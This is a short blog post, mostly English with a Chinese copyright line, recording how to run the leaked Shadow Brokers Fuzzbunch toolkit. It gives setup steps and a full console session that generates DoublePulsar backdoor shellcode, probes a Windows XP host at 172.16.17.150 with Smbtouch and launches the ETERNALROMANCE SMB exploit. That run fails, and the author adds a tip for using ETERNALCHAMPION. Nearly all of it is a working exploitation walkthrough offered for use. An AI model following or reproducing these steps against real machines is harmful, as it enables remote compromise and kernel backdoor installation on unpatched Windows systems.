版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_20307987/article/details/80321732
make a record . use nsa exploit -> ETERNALROMANCE to attack winxp \ winserver2003
(1)environment
python 2.6.6(python-2.6.6.msi)
shadowbroker-master.zip
pywin32-221.win32-py2.6.exe
which can be run on the windows xp or win7,look here !!!must 32 bit system!!!
(2)unrar shadowbroker-master.zip and use it for attack
if you run fb.py , you will get a error,than mkdir “listeningposts” under windows.than you can go go go !
C:\tools\shadowbroker-master\windows>python fb.py
--[ Version 3.5.1
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON
ImplantConfig Autorun List
==========================
0) prompt confirm
1) execute
Exploit Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
====================
0) apply
1) prompt confirm
2) execute
[+] Set FbStorage => C:\tools\shadowbroker-master\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 172.16.17.150
[?] Default Callback IP Address [] : 0.0.0.0
[?] Use Redirection [yes] : no
[?] Base Log directory [D:\logs] : c:\logs
[*] Checking c:\logs for projects
Index Project
----- -------
0 new
1 Create a New Project
[?] Project [0] : 0
[?] Set target log directory to 'c:\logs\new\z172.16.17.150'? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 172.16.17.150
[+] Set CallbackIp => 0.0.0.0
[!] Redirection OFF
[+] Set LogDir => c:\logs\new\z172.16.17.150
[+] Set Project => new
fb > use do
Domaintouch Doublepulsar
fb > use Doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.17.150
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 172.16.17.150
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [172.16.17.150] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
*0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] :
[*] Function :: Operation for backdoor to perform
*0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[?] Function [0] : 0
[*] OutputFile :: Full path to the output file
[?] OutputFile [] : c:\shellcode1.bin
[+] Set OutputFile => c:\shellcode1.bin
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.17.150] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.17.150:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 172.16.17.150
TargetPort 445
OutputFile c:\shellcode1.bin
Protocol SMB
Architecture x86
Function OutputInstall
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[+] Writing Installer to disk
[*] Deleting old version of OutputFile if it exists
[*] Shellcode written to OutputFile
[+] Doublepulsar Succeeded
fb Payload (Doublepulsar) > use eter
Eternalblue Eternalchampion Eternalromance Eternalsynergy
fb Payload (Doublepulsar) > use Eternalromance
[!] Entering Plugin Context :: Eternalromance
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.17.150
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.17.150
[*] Inheriting Input Variables
[!] Enter Prompt Mode :: Smbtouch
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [172.16.17.150] :
[*] TargetPort :: Port used by the SMB service
[?] TargetPort [445] :
[*] Pipe :: Test an additional pipe to see if it is accessible (optional)
[?] Pipe [] :
[*] Share :: Test a file share to see if it is accessible (optional), entered as hex bytes (in unicode)
[?] Share [] :
[*] Protocol :: SMB (default port 445) or NBT (default port 139)
*0) SMB
1) NBT
[?] Protocol [0] :
[*] Credentials :: Type of credentials to use
*0) Anonymous Anonymous (NULL session)
1) Guest Guest account
2) Blank User account with no password set
3) Password User name and password
4) NTLM User name and NTLM hash
[?] Credentials [0] :
[!] Preparing to Execute Smbtouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Configure Plugin Remote Tunnels
Module: Smbtouch
================
Name Value
---- -----
NetworkTimeout 60
TargetIp 172.16.17.150
TargetPort 445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt False
Pipe
Share
Protocol SMB
Credentials Anonymous
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started
[*] TargetIp 172.16.17.150
[*] TargetPort 445
[*] RedirectedTargetIp (null)
[*] RedirectedTargetPort 0
[*] NetworkTimeout 60
[*] Protocol SMB
[*] Credentials Anonymous
[*] Connecting to target...
[+] Initiated SMB connection
[+] Target OS Version 5.1 build 2600
Windows 5.1
[!] Target could be either SP2 or SP3,
[!] for these SMB exploits they are equivalent
[*] Trying pipes...
[+] spoolss - Success!
[+] Target is 32-bit
[Not Supported]
ETERNALSYNERGY - Target OS version not supported
[Vulnerable]
ETERNALBLUE - DANE
ETERNALROMANCE - FB
ETERNALCHAMPION - DANE/FB
[*] Writing output parameters
[+] Target is vulnerable to 3 exploits
[+] Touch completed successfully
[+] Smbtouch Succeeded
[*] Exporting Contract To Exploit
[+] Set PipeName => spoolss
[+] Set Credentials => Anonymous
[+] Set Target => XP_SP2SP3_X86
[!] Enter Prompt Mode :: Eternalromance
Module: Eternalromance
======================
Name Value
---- -----
NetworkTimeout 60
TargetIp 172.16.17.150
TargetPort 445
PipeName spoolss
ShellcodeFile
ExploitMethod Default
Credentials Anonymous
Protocol SMB
Target XP_SP2SP3_X86
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [172.16.17.150] :
[*] TargetPort :: Target TCP port
[?] TargetPort [445] :
[*] PipeName :: The named pipe to use
[?] PipeName [spoolss] :
[*] ShellcodeFile :: DOPU (ensure correct architecture) ONLY! Other shellcode will likely BSOD.
[?] ShellcodeFile [] : c:\\shellcode1.bin
[+] Set ShellcodeFile => c:\\shellcode1.bin
[*] ExploitMethod :: Which exploit method to use
*0) Default Use the best exploit method(s) for the target OS
1) Fish-in-a-barrel Most reliable exploit method (XP/2k3 only)
2) Matched-pairs Next reliable exploit method (XP/Win7/2k8R2 only)
3) Classic-Romance Original LargePageGroom exploit method (All OS Versions)
[?] ExploitMethod [0] :
[*] Credentials :: Type of credentials to use
*0) Anonymous Anonymous (NULL session)
1) Guest Guest account
2) Blank User account with no password set
3) Password User name and password
4) NTLM User name and NTLM hash
[?] Credentials [0] :
[*] Protocol :: SMB (default port 445) or NBT (default port 139)
*0) SMB
1) NBT
[?] Protocol [0] :
[*] Target :: Operating System, Service Pack, of target OS
0) XP_SP0SP1_X86 Windows XP Sp0 and Sp1, 32-bit
*1) XP_SP2SP3_X86 Windows XP Sp2 and Sp3, 32-bit
2) XP_SP1_X64 Windows XP Sp1, 64-bit
3) XP_SP2_X64 Windows XP Sp2, 64-bit
4) SERVER_2003_SP0 Windows Sever 2003 Sp0, 32-bit
5) SERVER_2003_SP1 Windows Sever 2003 Sp1, 32-bit/64-bit
6) SERVER_2003_SP2 Windows Sever 2003 Sp2, 32-bit/64-bit
7) VISTA_SP0 Windows Vista Sp0, 32-bit/64-bit
8) VISTA_SP1 Windows Vista Sp1, 32-bit/64-bit
9) VISTA_SP2 Windows Vista Sp2, 32-bit/64-bit
10) SERVER_2008_SP0 Windows Server 2008 Sp0, 32-bit/64-bit
11) SERVER_2008_SP1 Windows Server 2008 Sp1, 32-bit/64-bit
12) SERVER_2008_SP2 Windows Server 2008 Sp2, 32-bit/64-bit
13) WIN7_SP0 Windows 7 Sp0, 32-bit/64-bit
14) WIN7_SP1 Windows 7 Sp1, 32-bit/64-bit
15) SERVER_2008R2_SP0 Windows Server 2008 R2 Sp0, 32-bit/64-bit
16) SERVER_2008R2_SP1 Windows Server 2008 R2 Sp1, 32-bit/64-bit
[?] Target [1] :
[!] Preparing to Execute Eternalromance
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.17.150] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.17.150:445
[+] Configure Plugin Remote Tunnels
Module: Eternalromance
======================
Name Value
---- -----
NetworkTimeout 60
TargetIp 172.16.17.150
TargetPort 445
MaxExploitAttempts 3
PipeName spoolss
ExploitMethodChoice 0
ShellcodeFile c:\shellcode1.bin
CredChoice 0
Username
Password
UsingNbt False
OsMajor 5
OsMinor 1
OsServicePack 2
ExploitMethod Default
Credentials Anonymous
Protocol SMB
Target XP_SP2SP3_X86
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Running Exploit
[*] Initializing Parameters
[+] Target 172.16.17.150:445
[+] Authcode: 0x7f4afb0f
[+] XorMask: 0xe9
[+] Network Timeout: 60 seconds
[*] Attempting exploit method 1
[*] Initializing Network
[+] Initial smb session setup completed
[*] Trying pipe spoolss...
[+] Success!
[+] Smb pipe and rpc setup complete
[*] Filling barrel with fish... done
<----------------| Entering Danger Zone |----------------->
[*] Preparing dynamite...
[*] Trying stick 1 (x86)...Miss
[*] Trying stick 2 (x86)...Miss
[*] Trying stick 3 (x86)...Miss
[-] Error 48 (DoRemoteApiLeak)
[-] Error 48 (RunExploitMethod1)
[*] Connections closed, exploit method 1 unsuccessful
[*] Attempting exploit method 2
[*] Initializing Network
[+] Initial smb session setup completed
[*] Trying pipe spoolss...
[+] Success!
[+] Smb pipe and rpc setup complete
[*] Performing initial groom, this may take some time
[*] Sending 36 groom packets........ done
[*] Sending 64 bride packets....... done
<----------------| Entering Danger Zone |----------------->
[*] Invoking leak to find transaction...
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[*] Performing initial groom, this may take some time
[*] Sending 36 groom packets........ done
[*] Sending 64 bride packets....... done
[*] Invoking leak to find transaction...
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[*] Performing initial groom, this may take some time
[*] Sending 36 groom packets........ done
[*] Sending 64 bride packets....... done
[*] Invoking leak to find transaction...
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[-] Error 46 (RunExploitMethod2)
[-] Error 46 (RunPlugin)
[-] Error 46 (processParams)
[!] Plugin failed
[-] Error: Eternalromance Failed
OK!!! its a error, i don't know why,when i first use it,sucess!gusess......
tips: if you want to use Eternalchampion
must use copy byte-shellcode as eternalchampion's payload
here is a link:http://www.freebuf.com/articles/system/135270.html